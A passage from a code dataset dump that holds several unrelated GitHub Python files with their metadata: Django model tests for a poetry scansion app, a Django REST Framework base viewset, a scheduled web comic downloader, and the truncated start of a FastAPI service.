\"squirrel, /u, popularity: 1\")\n \n def test_stresspattern_invalid(self):\n s = StressPattern.objects.filter(word=Word.objects.get(word=\"squirrel\"))\n self.assertFalse(s[0].is_valid())\n self.assertEqual(s[0].__str__(), \"squirrel, squirrel, popularity: 1\")\n\nclass TestPoet(TestCase):\n @classmethod\n def setUpTestData(cls):\n Poet.objects.create(last_name=\"Shakespeare\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", birth=2000, death=1952, bio=\"Lived backward like Merlin!\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", birth=3000, bio=\"Poets of the future!\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", death=3000, bio=\"Not dead yet.\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", birth=2000, death=3000, bio=\"Still not dead yet.\")\n \n def test_poet_defaults(self):\n p = Poet.objects.filter(last_name=\"Shakespeare\")\n self.assertEqual(p.count(), 1)\n for trait in [p[0].first_name, p[0].birth, p[0].death, p[0].bio]:\n self.assertTrue(trait is None or trait==\"\")\n self.assertTrue(p[0].is_valid())\n self.assertEqual(p[0].__str__(), \"Shakespeare\")\n \n def test_poets__invalid(self):\n p = Poet.objects.filter(last_name=\"Doe\")\n self.assertEqual(p.count(), 4)\n for poet in p:\n self.assertFalse(poet.is_valid())\n self.assertEqual(poet.__str__(), \"Doe\")\n \nclass TestPoem(TestCase):\n @classmethod\n def setUpTestData(cls):\n Poet.objects.create(last_name=\"Shakespeare\")\n Poem.objects.create(poem=\"moon squirrel\")\n Poem.objects.create(title=\"A Sea Dirge\", poet=Poet.objects.get(last_name=\"Shakespeare\"), poem=\"\"\"Full fathom five thy father lies:\nOf his bones are coral made;\nThose are pearls that were his eyes:\nNothing of him that doth fade,\nBut doth suffer a sea-change\nInto something rich and strange;\nSea-nymphs hourly ring his knell:\nHark! now I hear them,--\nDing, dong, Bell.\"\"\", scansion=\"\"\"u /u / u /u /\n/ u / u /u /\n/ u / u / u /\n/u / u / u /\nu u /u u /u\n/u /u / u /\n/u /u / u /\n/ u u / u\n/ u /\"\"\")\n\n def test_poem_defaults(self):\n p = Poem.objects.filter(poem=\"moon squirrel\")\n self.assertEqual(p.count(), 1)\n self.assertEqual(p[0].title, \"\")\n self.assertIsNone(p[0].poet)\n self.assertEqual(p[0].scansion, \"\")\n self.assertTrue(p[0].has_valid_scansion)\n self.assertEqual(p[0].first_line(), \"moon squirrel\")\n self.assertEqual(p[0].__str__(), \"moon squirrel\")\n\n def test_poem_values(self):\n p = Poem.objects.filter(title=\"A Sea Dirge\")\n self.assertEqual(p.count(), 1)\n self.assertTrue(p[0].has_valid_scansion())\n self.assertEqual(p[0].poet.last_name, \"Shakespeare\")\n self.assertEqual(p[0].first_line(), \"Full fathom five thy father lies:\")\n self.assertEqual(p[0].__str__(), \"A Sea Dirge by Shakespeare\")\n\nclass TestAlgorithm(TestCase):\n @classmethod\n def setUpTestData(cls):\n Algorithm.objects.create(name=\"Original Scan\")\n Algorithm.objects.create(name=\"House Robber Scan\", about=\"An algorithm\", preferred=True)\n\n def test_algorithm_defaults(self):\n a = Algorithm.objects.filter(name=\"Original Scan\")\n self.assertEqual(a[0].about, \"\")\n self.assertFalse(a[0].preferred)\n self.assertEqual(a[0].__str__(), \"Original Scan, preferred: False\")\n\n def test_algorithm_values(self):\n a = Algorithm.objects.filter(name=\"House Robber Scan\")\n self.assertEqual(a[0].about, \"An algorithm\")\n self.assertTrue(a[0].preferred)\n self.assertEqual(a[0].__str__(), \"House Robber Scan, preferred: True\")\n\nclass TestHumanScansion(TestCase):\n @classmethod\n def setUpTestData(cls):\n User.objects.create(username=\"someone\", score=10)\n User.objects.create(username=\"someoneelse\", score=10)\n Poem.objects.create(poem=\"moon squirrel\")\n HumanScansion.objects.create(\n poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"/ uu\", user=User.objects.get(username=\"someone\")\n )\n HumanScansion.objects.create(\n poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"afds\", user=User.objects.get(username=\"someoneelse\") \n )\n\n def test_human_scansion_valid(self):\n hs = HumanScansion.objects.all()\n self.assertEqual(hs.count(), 2)\n self.assertTrue(hs[0].is_valid())\n self.assertEqual(hs[0].__str__(), \"User1's scansion of moon squirrel\")\n \n def test_human_scansion_invalid(self):\n hs = HumanScansion.objects.all()\n self.assertFalse(hs[1].is_valid())\n\nclass TestMachineScansion(TestCase):\n @classmethod\n def setUpTestData(cls):\n Poem.objects.create(poem=\"moon squirrel\")\n Algorithm.objects.create(name=\"Buggy Algorithm\")\n Algorithm.objects.create(name=\"House Robber Algorithm\")\n MachineScansion.objects.create(\n poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"saf;jd\", algorithm=Algorithm.objects.get(name=\"Buggy Algorithm\")\n )\n MachineScansion.objects.create(\n poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"/ u/\", algorithm=Algorithm.objects.get(name=\"House Robber Algorithm\")\n )\n def test_machine_scansion_valid(self):\n ms = MachineScansion.objects.all()\n self.assertEqual(ms.count(), 2)\n self.assertTrue(ms[1].is_valid())\n self.assertEqual(ms[1].__str__(), \"House Robber Algorithm scansion of moon squirrel\")\n\n\n def test_machine_scansion_invalid(self):\n ms = MachineScansion.objects.all()\n self.assertFalse(ms[0].is_valid())\n", "repo_name": "Hathaway2010/poetry-react", "sub_path": "scansion/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 8193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 4, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 7, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 7, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 8, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 8, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 11, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 18, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 24, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 27, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.create", "line_number": 28, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 28, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 31, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 40, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 47, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.create", "line_number": 50, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 50, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.create", "line_number": 51, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scansion.models.StressPattern", "line_number": 51, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 51, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 51, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.create", "line_number": 52, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "scansion.models.StressPattern", "line_number": 52, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 52, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scansion.models.StressPattern", "line_number": 55, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 55, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "scansion.models.StressPattern", "line_number": 64, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 64, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 64, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 68, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 71, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 71, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 72, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 72, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 72, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 73, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 73, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 74, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 74, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 75, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 75, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 78, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.filter", "line_number": 86, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 86, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 92, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 95, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 95, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 96, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 96, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 97, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 97, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 97, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 116, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 126, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 133, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 136, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 136, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 137, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 137, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.filter", "line_number": 140, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 140, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 146, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 151, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 154, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 154, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 155, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 155, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 156, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 156, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.create", "line_number": 157, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 157, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.get", "line_number": 158, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 158, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 158, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.get", "line_number": 158, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 158, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 158, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.create", "line_number": 160, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 160, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.get", "line_number": 161, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 161, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.get", "line_number": 161, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 161, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.all", "line_number": 165, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 165, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.all", "line_number": 171, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 171, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 174, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 177, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 177, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 177, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 178, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 178, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 178, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 179, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 179, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.create", "line_number": 180, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 180, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.get", "line_number": 181, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 181, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 181, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.get", "line_number": 181, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 181, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 181, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.create", "line_number": 183, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 183, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 184, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 184, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.all", "line_number": 187, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 187, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 187, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.all", "line_number": 194, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 194, "usage_type": "name"}]} +{"seq_id": "43195962020", "text": "from .response import json_ok_response, json_error_response\n\nfrom rest_framework.viewsets import ModelViewSet\nfrom rest_framework.views import APIView\n\n\nclass BaseModelViewSet(ModelViewSet):\n \"\"\"\n 视图集合基类\n \"\"\"\n\n def create(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).create(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n def update(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).update(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n def destroy(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).destroy(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n def list(self, request, *args, **kwargs):\n try:\n ordering = request.query_params.get('ordering', '')\n ordering = ordering.replace('+', '').strip()\n if ordering:\n if self.serializer_class is None:\n queryset = self.filter_queryset(self.get_serializer_class().Meta.model.objects.order_by(ordering))\n else:\n queryset = self.filter_queryset(self.serializer_class.Meta.model.objects.order_by(ordering))\n else:\n queryset = self.filter_queryset(self.get_queryset())\n page = request.query_params.get('page', '')\n size = request.query_params.get('size', '')\n if page or size:\n page_queryset = self.paginate_queryset(queryset)\n if page is not None:\n serializer = self.get_serializer(page_queryset, many=True)\n return self.get_paginated_response(serializer.data)\n serializer = self.get_serializer(queryset, many=True)\n return json_ok_response(data=serializer.data)\n except Exception as e:\n return json_error_response(message=str(e))\n\n\n def retrieve(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).retrieve(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n\nclass BaseApiView(APIView):\n \"\"\"\n APIView视图类\n \"\"\"\n pass\n # authentication_classes = [JSONWebTokenAuthentication]\n # permission_classes = [IsAuthenticated, ]\n\n# class TreeModelViewSet(BaseModelViewSet):\n# serializer_class = TreeSerializer\n#\n# def list(self, request, *args, **kwargs):\n# queryset = self.filter_queryset(self.get_queryset())\n# page = self.paginate_queryset(queryset)\n# s = self.get_serializer(queryset, many=True)\n# response = []\n# try:\n# tree_dict = {item['id']: item for item in s.data}\n# for i in tree_dict:\n# if tree_dict[i]['pid']:\n# pid = tree_dict[i]['pid']\n# parent = tree_dict[pid]\n# parent.setdefault('children', []).append(tree_dict[i])\n# else:\n# response.append(tree_dict[i])\n# except KeyError:\n# response = s.data\n# if page is not None:\n# response = self.get_paginated_response(response)\n# return json_ok_response(response.data)\n# return json_ok_response(response)\n", "repo_name": "yanshicheng/super_ops", "sub_path": "base/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 7, "usage_type": "name"}, {"api_name": "response.json_ok_response", "line_number": 14, "usage_type": "call"}, {"api_name": "response.data", "line_number": 14, "usage_type": "attribute"}, {"api_name": "response.json_ok_response", "line_number": 18, "usage_type": "call"}, {"api_name": "response.data", "line_number": 18, "usage_type": "attribute"}, {"api_name": "response.json_ok_response", "line_number": 22, "usage_type": "call"}, {"api_name": "response.data", "line_number": 22, "usage_type": "attribute"}, {"api_name": "response.json_ok_response", "line_number": 43, "usage_type": "call"}, {"api_name": "response.json_error_response", "line_number": 45, "usage_type": "call"}, {"api_name": "response.json_ok_response", "line_number": 50, "usage_type": "call"}, {"api_name": "response.data", "line_number": 50, "usage_type": "attribute"}, {"api_name": "rest_framework.views.APIView", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "38920365731", "text": "#!/usr/bin/env python3\n# Write a program that checks the websites of several web comics and auto-\n# matically downloads the images if the comic was updated since the pro-\n# gram’s last visit. Your operating system’s scheduler (Scheduled Tasks on\n# Windows, launchd on macOS, and cron on Linux) can run your Python\n# program once a day. The Python program itself can download the comic\n# and then copy it to your desktop so that it is easy to find. This will free you\n# from having to check the website yourself to see whether it has updated.\n# (A list of web comics is available at https://nostarch.com/automatestuff2/.)\n# https://www.lefthandedtoons.com/\n# https://buttersafe.com/\n# https://www.savagechickens.com/\n# https://www.lunarbaboon.com/\n# https://completelyseriouscomics.com/\n# https://www.exocomics.com/\n# https://nonadventures.com/\n# https://moonbeard.com/\n# https://www.happletea.com/\n# a for loop that goes trough all websites\n# check the date of a posted image, if it is greater than that\n# of last visit then download it and place to a folder\n# program should remember the date of last visit\nimport requests\nimport bs4\nimport os\nimport datetime\nimport shelve\n\ncomicWebsites = [\n 'http://www.lefthandedtoons.com/',\n 'http://buttersafe.com/',\n 'http://www.savagechickens.com/',\n 'http://www.lunarbaboon.com/',\n 'http://www.exocomics.com/',\n 'http://nonadventures.com/',\n 'http://moonbeard.com/',\n 'http://www.happletea.com/'\n]\ncomicShelf = shelve.open('comicLastCheck')\ncomicShelf.setdefault(\n 'lastTimeChecked', datetime.datetime.fromtimestamp(0))\n\nos.makedirs('comics', exist_ok=True)\ncomicWebsite = comicWebsites[4]\nres = requests.get(comicWebsite)\nsoup = bs4.BeautifulSoup(res.text, 'html.parser')\ndateElem = soup.select('.date')\ndateComic = datetime.datetime.strptime(dateElem[0].getText(), \"%d %b '%y\")\nprint('Comics was posted on ', dateComic)\nprint('Last visit was on', comicShelf['lastTimeChecked'])\nif dateComic > comicShelf['lastTimeChecked']:\n comicElem = soup.select('.image-style-main-comic')\n comicUrl = comicWebsite + comicElem[0].get('src')\n res = requests.get(comicUrl)\n res.raise_for_status()\n path = os.path.join('comics', os.path.basename(comicUrl))\n print(f'Downloading image {comicUrl}...')\n imageFile = open(path, 'wb')\n for chunk in res.iter_content(100000):\n imageFile.write(chunk)\n imageFile.close()\n dateNow = datetime.datetime.now()\n comicShelf['lastTimeChecked'] = dateNow\nelse:\n print('No updates available')\ncomicShelf.close()\n", "repo_name": "shadowy-pycoder/learning_python", "sub_path": "sheduled_web_comic_downloader.py", "file_name": "sheduled_web_comic_downloader.py", "file_ext": "py", "file_size_in_byte": 2547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "shelve.open", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "15331379135", "text": "# mypy: disallow_untyped_defs=True\nfrom abc import abstractmethod\nfrom typing import List\n\nfrom flask import current_app\nfrom pandas import DataFrame\n\nfrom db.druid.datasource import DruidDatasource\nfrom db.druid.query_builder import GroupByQueryBuilder\nfrom web.server.routes.views.query_policy import AuthorizedQueryClient\nfrom web.server.query.request import QueryRequest\nfrom web.server.query.visualizations.base import QueryBase\nfrom web.server.query.visualizations.util import build_key_column\n\nGEO_FIELD_ORDERING = current_app.zen_config.aggregation.GEO_FIELD_ORDERING\n\n\nclass OutliersBase(QueryBase):\n '''Base class for outlier analysis queries in DQL.'''\n\n def __init__(\n self,\n request: QueryRequest,\n query_client: AuthorizedQueryClient,\n datasource: DruidDatasource,\n ):\n # Disable intermediate date filling because it is not needed for Outliers\n # score computation.\n super().__init__(request, query_client, datasource, False)\n\n self.lowest_granularity_geo = GEO_FIELD_ORDERING[-1]\n self.query_dimension_names: List[str] = []\n\n def build_query(self) -> GroupByQueryBuilder:\n query = self.request.to_druid_query(self.datasource.name)\n\n # We want to look for outliers at the report level so we add all\n # geography dimensions to the group by\n for geo_dimension in GEO_FIELD_ORDERING:\n if not geo_dimension in query.dimensions:\n query.dimensions = [*query.dimensions, geo_dimension]\n\n self.query_dimension_names = query.dimensions\n return query\n\n def build_df(self, raw_df: DataFrame) -> DataFrame:\n if raw_df.empty:\n return raw_df\n\n non_null_dimensions = [\n dimension\n for dimension in self.query_dimension_names\n if not raw_df[dimension].isnull().values.all()\n ]\n\n if self.query_dimension_names and len(non_null_dimensions) > 0:\n # Ensure that each dimension value has a unique key by including\n # values from higher up the hierarchy if neccessary.\n label_df = build_key_column(\n raw_df, 'key', non_null_dimensions, non_null_dimensions\n )\n\n return raw_df.join(label_df, on=non_null_dimensions)\n\n return raw_df\n\n @abstractmethod\n def build_response(self, df: DataFrame) -> dict:\n pass\n", "repo_name": "Zenysis/Harmony", "sub_path": "web/server/query/data_quality/outliers_base.py", "file_name": "outliers_base.py", "file_ext": "py", "file_size_in_byte": 2404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.current_app.zen_config", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 15, "usage_type": "name"}, {"api_name": "web.server.query.visualizations.base.QueryBase", "line_number": 18, "usage_type": "name"}, {"api_name": "web.server.query.request.QueryRequest", "line_number": 23, "usage_type": "name"}, {"api_name": "web.server.routes.views.query_policy.AuthorizedQueryClient", "line_number": 24, "usage_type": "name"}, {"api_name": "db.druid.datasource.DruidDatasource", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "db.druid.query_builder.GroupByQueryBuilder", "line_number": 34, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 46, "usage_type": "name"}, {"api_name": "web.server.query.visualizations.util.build_key_column", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "22673919743", "text": "import uvicorn\nfrom transformers import pipeline\nfrom typing import Annotated\nfrom fastapi import FastAPI, status, UploadFile, Response, Form, File\nfrom fastapi.responses import RedirectResponse\nfrom src.constants import 